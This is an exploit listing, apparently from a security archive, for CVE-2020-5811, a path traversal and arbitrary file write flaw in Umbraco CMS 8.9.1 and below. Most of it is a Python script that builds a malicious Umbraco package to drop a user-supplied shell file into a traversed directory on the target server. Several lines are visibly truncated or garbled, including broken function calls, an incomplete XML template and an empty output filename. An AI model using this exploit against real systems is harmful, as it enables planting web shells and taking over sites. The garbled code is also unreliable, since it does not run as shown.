Umbraco CMS 8.9.1 Traversal / Arbitrary File Write

Umbraco CMS versions 8.9.1 and below suffer from path traversal and arbitrary file write vulnerabilities.

MD5 | 0a99ada2f17347f95a647a852d95bcfe

# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research:
# Vendor Homepage:
# Version: <= 8.9.1
# CVE : CVE-2020-5811

import string
import random
import argparse
import zipfile
import os

package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
<license url="">MIT License</license>
<DocumentTypes />
<Templates />
<Stylesheets />
<Macros />
<DictionaryItems />
<Languages />
<DataTypes />
<Actions />

parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()

if not os.path.isfile(
print("[ERROR] please use a correct path for the shell file.")

output_file = ""

package = zipfile.ZipFile(output_file, 'w')
package.writestr('package.xml', package_xml.format(filename=os.path.basename(, upload_path=args.upload_path))
package.writestr(os.path.basename(, open(, 'r').read())

print(f"[DONE] Created Umbraco package: {output_file}")

Related Posts